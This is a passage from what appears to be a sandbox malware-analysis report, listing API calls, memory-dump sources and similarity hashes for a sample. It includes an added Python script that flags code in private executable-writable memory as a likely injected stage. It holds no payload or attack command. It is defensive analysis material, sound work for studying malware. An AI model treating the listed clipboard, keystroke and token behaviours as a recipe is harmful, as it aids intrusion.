                                                                                      • Snapshot File: hcaresult_0_2_14df000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction ID: b09c9d5cbfd548efd769620869849e5113e88ca66554316f687fa9c886058c6f
                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction Fuzzy Hash: 8BE0E67498010DDFDB00EFB4D64D6AE7FF4EF04702F100565FD01D2281D6309D508A62
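Both Sleep(000001F4) blocks above (0x1F4 = 500 ms) come from dump 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, which the report marks "based on PE: false", whereas every other block in this section is backed by the image at 00C10000. Reading the dump name's fields as Windows memory attributes, 00000040 is PAGE_EXECUTE_READWRITE and 00020000 is MEM_PRIVATE: executable, writable, not image-backed memory, which is where an unpacked or injected stage normally lives. The following script is an added example, not Joe Sandbox code: it parses function blocks in this listing's format and returns the ones sitting in such regions, so an analyst can jump straight to them. The two sample blocks are copied from this listing with hashes shortened; the meaning assigned to the dot-separated fields of the .sdmp name (base, protection, state, region type) is an assumption inferred from the values on this page, not a documented format.

```python
"""Parse Joe Sandbox 'APIs / Memory Dump Source / Similarity' function blocks and
flag code living in non-image, RWX memory (candidate injected/unpacked stage).
Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

# Windows memory constants from winnt.h (real values, not assumptions).
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

# "Sleep.KERNELBASE(000001F4), ref: 014E1BC1", "GetInputState.USER32 ref: 00C1D807",
# optionally prefixed with "Part of subcall function XXXXXXXX: ".
API_RE = re.compile(
    r"^(?:Part of subcall function [0-9A-Fa-f]+: )?"
    r"([A-Za-z_0-9]+)\.([A-Za-z_0-9]+)(?:\(.*?\))?,? ref: ([0-9A-Fa-f]+)")
SRC_RE = re.compile(
    r"^Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")

SECTION_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Strings"}


@dataclass
class FuncBlock:
    apis: list = field(default_factory=list)  # (api, module, ref address, is_subcall)
    dump: str = ""
    offset: int = 0
    pe_backed: bool = True
    api_id: str = ""
    opcode_id: str = ""

    def _field(self, i: int) -> int:
        # ASSUMED layout: proc.stage.id.base.protect.state.type.idx.sdmp
        parts = self.dump.split(".")
        return int(parts[i], 16) if len(parts) > 7 else 0

    @property
    def protect(self) -> int:
        return self._field(4)

    @property
    def region_type(self) -> int:
        return self._field(6)


def parse_blocks(text: str) -> list:
    """Split the listing into FuncBlocks; a new block starts at each 'APIs' line."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        if line == "APIs":
            cur = FuncBlock()
            blocks.append(cur)
            section = "APIs"
            continue
        if cur is None:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append((m.group(1), m.group(2), int(m.group(3), 16),
                                 line.startswith("Part of subcall")))
        elif section == "Memory Dump Source":
            m = SRC_RE.match(line)
            if m:
                cur.dump = m.group(1)
                cur.offset = int(m.group(2), 16)
                cur.pe_backed = (m.group(3) == "true")
        elif section == "Similarity":
            if line.startswith("API ID: "):
                cur.api_id = line[len("API ID: "):]
            elif line.startswith("Opcode ID: "):
                cur.opcode_id = line[len("Opcode ID: "):]
    return blocks


def unbacked_executable(blocks: list) -> list:
    """Blocks whose code is in private, RWX, non-image memory: review these first."""
    return [b for b in blocks
            if not b.pe_backed
            and b.protect & PAGE_EXECUTE_READWRITE
            and b.region_type == MEM_PRIVATE]


# Two blocks copied from this listing (hash fields shortened); constructed sample input.
SAMPLE = """\
APIs
• CloseHandle.KERNELBASE(?,?,00000000,00C524E0), ref: 00C16266
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: e275fbfb
APIs
• Sleep.KERNELBASE(000001F4), ref: 014E1BC1
Memory Dump Source
• Source File: 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DF000, based on PE: false
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae
"""

if __name__ == "__main__":
    for b in unbacked_executable(parse_blocks(SAMPLE)):
        names = ", ".join(f"{a}.{mod}@{ref:08X}" for a, mod, ref, _ in b.apis)
        print(f"{b.offset:08X} protect={b.protect:#x} type={b.region_type:#x} apis={names}")
```

Treat the result as a triage pointer rather than a verdict: runtimes such as AutoIt also allocate writable executable pages for their own purposes, so a hit says where to open the dump in the disassembler, not that the code there is the payload.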
                                                                                      APIs
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00CA961A
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CA965B
                                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00CA969F
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CA96C9
                                                                                      • SendMessageW.USER32 ref: 00CA96F2
                                                                                      • GetKeyState.USER32(00000011), ref: 00CA978B
                                                                                      • GetKeyState.USER32(00000009), ref: 00CA9798
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CA97AE
                                                                                      • GetKeyState.USER32(00000010), ref: 00CA97B8
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CA97E9
                                                                                      • SendMessageW.USER32 ref: 00CA9810
                                                                                      • SendMessageW.USER32(?,00001030,?,00CA7E95), ref: 00CA9918
                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00CA992E
                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00CA9941
                                                                                      • SetCapture.USER32(?), ref: 00CA994A
                                                                                      • ClientToScreen.USER32(?,?), ref: 00CA99AF
                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00CA99BC
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CA99D6
                                                                                      • ReleaseCapture.USER32 ref: 00CA99E1
                                                                                      • GetCursorPos.USER32(?), ref: 00CA9A19
                                                                                      • ScreenToClient.USER32(?,?), ref: 00CA9A26
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CA9A80
                                                                                      • SendMessageW.USER32 ref: 00CA9AAE
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CA9AEB
                                                                                      • SendMessageW.USER32 ref: 00CA9B1A
                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CA9B3B
                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CA9B4A
                                                                                      • GetCursorPos.USER32(?), ref: 00CA9B68
                                                                                      • ScreenToClient.USER32(?,?), ref: 00CA9B75
                                                                                      • GetParent.USER32(?), ref: 00CA9B93
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CA9BFA
                                                                                      • SendMessageW.USER32 ref: 00CA9C2B
                                                                                      • ClientToScreen.USER32(?,?), ref: 00CA9C84
                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CA9CB4
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CA9CDE
                                                                                      • SendMessageW.USER32 ref: 00CA9D01
                                                                                      • ClientToScreen.USER32(?,?), ref: 00CA9D4E
                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CA9D82
                                                                                        • Part of subcall function 00C29944: GetWindowLongW.USER32(?,000000EB), ref: 00C29952
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CA9E05
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                      • String ID: @GUI_DRAGID$F
                                                                                      • API String ID: 3429851547-4164748364
                                                                                      • Opcode ID: 78010ba403b686facd859c1404158d54d43f71048d07a68ad78a7510da37ac93
                                                                                      • Instruction ID: d303cc1e76eb2ab5ab980daf74531a1f711105e4c26a8a7512629bc0a1a2a662
                                                                                      • Opcode Fuzzy Hash: 78010ba403b686facd859c1404158d54d43f71048d07a68ad78a7510da37ac93
                                                                                      • Instruction Fuzzy Hash: 8842AE34604642AFDB24CF24CC85BAABBF5FF4A328F140619FA69872A1D731D960DF51
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00CA48F3
                                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00CA4908
                                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00CA4927
                                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00CA494B
                                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00CA495C
                                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00CA497B
                                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00CA49AE
                                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00CA49D4
                                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00CA4A0F
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00CA4A56
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00CA4A7E
                                                                                      • IsMenu.USER32(?), ref: 00CA4A97
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CA4AF2
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CA4B20
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CA4B94
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00CA4BE3
                                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00CA4C82
                                                                                      • wsprintfW.USER32 ref: 00CA4CAE
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CA4CC9
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00CA4CF1
                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CA4D13
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CA4D33
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00CA4D5A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                      • String ID: %d/%02d/%02d
                                                                                      • API String ID: 4054740463-328681919
                                                                                      • Opcode ID: e5081494b478c0827bfc7c1d334316d3df9566b2b4a82dbd282cd8dcdb4f4f73
                                                                                      • Instruction ID: e9447693c7b19b627af0f9c804cd16e079563ffe6c411d6af2d604d0cd925304
                                                                                      • Opcode Fuzzy Hash: e5081494b478c0827bfc7c1d334316d3df9566b2b4a82dbd282cd8dcdb4f4f73
                                                                                      • Instruction Fuzzy Hash: E4121631500215AFEB298F64DC49FAE7BF8EF86318F104129F525EB1E1DBB49A41CB50
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00C2F998
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C6F474
                                                                                      • IsIconic.USER32(00000000), ref: 00C6F47D
                                                                                      • ShowWindow.USER32(00000000,00000009), ref: 00C6F48A
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C6F494
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C6F4AA
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C6F4B1
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C6F4BD
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C6F4CE
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C6F4D6
                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00C6F4DE
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C6F4E1
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C6F4F6
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C6F501
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C6F50B
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C6F510
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C6F519
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C6F51E
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C6F528
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C6F52D
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C6F530
                                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00C6F557
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 4125248594-2988720461
                                                                                      • Opcode ID: e35c545211c605e56ddc1407cd67be39b372d3167805377b7615c36675da43b9
                                                                                      • Instruction ID: 923f81d4c0974491dce129f99dc01ca37a52a3ed33cf28bcc7bc4a06abf24b69
                                                                                      • Opcode Fuzzy Hash: e35c545211c605e56ddc1407cd67be39b372d3167805377b7615c36675da43b9
                                                                                      • Instruction Fuzzy Hash: 5F313271A40218BFEB316BB55C8AFBF7E7CEB45B54F100069FA01E71D1CAB15D11AA60
                                                                                      APIs
                                                                                        • Part of subcall function 00C716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7170D
                                                                                        • Part of subcall function 00C716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C7173A
                                                                                        • Part of subcall function 00C716C3: GetLastError.KERNEL32 ref: 00C7174A
                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C71286
                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C712A8
                                                                                      • CloseHandle.KERNEL32(?), ref: 00C712B9
                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C712D1
                                                                                      • GetProcessWindowStation.USER32 ref: 00C712EA
                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00C712F4
                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C71310
                                                                                        • Part of subcall function 00C710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C711FC), ref: 00C710D4
                                                                                        • Part of subcall function 00C710BF: CloseHandle.KERNEL32(?,?,00C711FC), ref: 00C710E9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                      • String ID: $default$winsta0
                                                                                      • API String ID: 22674027-1027155976
                                                                                      • Opcode ID: 313846b75139a8f9d9ce85edeb0e2fc6e5de9e1ea6b1bb5bd4f4fd0b7183aa43
                                                                                      • Instruction ID: b830dcd230acb9578e5415b3137293b6edf47fa91ccd28ca38c50db1c3b290b1
                                                                                      • Opcode Fuzzy Hash: 313846b75139a8f9d9ce85edeb0e2fc6e5de9e1ea6b1bb5bd4f4fd0b7183aa43
                                                                                      • Instruction Fuzzy Hash: 5881A171900209AFDF219FA9DC49FEE7BB9EF05704F188129FD28E61A0D7348A44CB60
                                                                                      APIs
                                                                                        • Part of subcall function 00C710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C71114
                                                                                        • Part of subcall function 00C710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C71120
                                                                                        • Part of subcall function 00C710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C7112F
                                                                                        • Part of subcall function 00C710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C71136
                                                                                        • Part of subcall function 00C710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C7114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C70BCC
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C70C00
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C70C17
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00C70C51
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C70C6D
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C70C84
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C70C8C
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C70C93
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C70CB4
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00C70CBB
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C70CEA
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C70D0C
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C70D1E
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C70D45
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70D4C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C70D55
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70D5C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C70D65
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70D6C
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C70D78
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70D7F
                                                                                        • Part of subcall function 00C71193: GetProcessHeap.KERNEL32(00000008,00C70BB1,?,00000000,?,00C70BB1,?), ref: 00C711A1
                                                                                        • Part of subcall function 00C71193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C70BB1,?), ref: 00C711A8
                                                                                        • Part of subcall function 00C71193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C70BB1,?), ref: 00C711B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      • Opcode ID: 32623099828cf343ad759f6529ff5581a51bbaa13d6ad15ad31d3a161c0c6b35
                                                                                      • Instruction ID: 9b3526b69e50e148c8fc96943df08977017a289bd129e5063c991da881bc2f0f
                                                                                      • Opcode Fuzzy Hash: 32623099828cf343ad759f6529ff5581a51bbaa13d6ad15ad31d3a161c0c6b35
                                                                                      • Instruction Fuzzy Hash: 3F716D71A0020AEBDF10DFA5DC84FEEBBB8BF15304F148519F929A7291D771AA05CB60
                                                                                      APIs
                                                                                      • OpenClipboard.USER32(00CACC08), ref: 00C8EB29
                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C8EB37
                                                                                      • GetClipboardData.USER32(0000000D), ref: 00C8EB43
                                                                                      • CloseClipboard.USER32 ref: 00C8EB4F
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00C8EB87
                                                                                      • CloseClipboard.USER32 ref: 00C8EB91
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00C8EBBC
                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00C8EBC9
                                                                                      • GetClipboardData.USER32(00000001), ref: 00C8EBD1
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00C8EBE2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00C8EC22
                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00C8EC38
                                                                                      • GetClipboardData.USER32(0000000F), ref: 00C8EC44
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00C8EC55
                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C8EC77
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C8EC94
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C8ECD2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00C8ECF3
                                                                                      • CountClipboardFormats.USER32 ref: 00C8ED14
                                                                                      • CloseClipboard.USER32 ref: 00C8ED59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                      • String ID:
                                                                                      • API String ID: 420908878-0
                                                                                      • Opcode ID: ab582d547fa1a0e494a7cf840864fb9bd43abfa697df63c013885e150f8d67ac
                                                                                      • Instruction ID: b3054bbf44e5fb664a5d2af0fd31b6c5089bafd1c599c9345f04ff831cb53158
                                                                                      • Opcode Fuzzy Hash: ab582d547fa1a0e494a7cf840864fb9bd43abfa697df63c013885e150f8d67ac
                                                                                      • Instruction Fuzzy Hash: 8861BF342042019FD300EF24D895F7EB7E4EF86718F144519F466972A2DB31EE4ADBA6
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C869BE
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C86A12
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C86A4E
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C86A75
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C86AB2
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C86ADF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                      • API String ID: 3830820486-3289030164
                                                                                      • Opcode ID: 1d764e9eba58142075db47f59a8afea49cc7831388d542c5b6e2b8925d88897c
                                                                                      • Instruction ID: c16cc7276f3858ae5a934261cd0b74fa9111227c9dea95d06642a1db20d35975
                                                                                      • Opcode Fuzzy Hash: 1d764e9eba58142075db47f59a8afea49cc7831388d542c5b6e2b8925d88897c
                                                                                      • Instruction Fuzzy Hash: 1DD15E72508300AFC314EBA4D891EAFB7ECAF89704F04492DF595C7291EB74DA45EB62
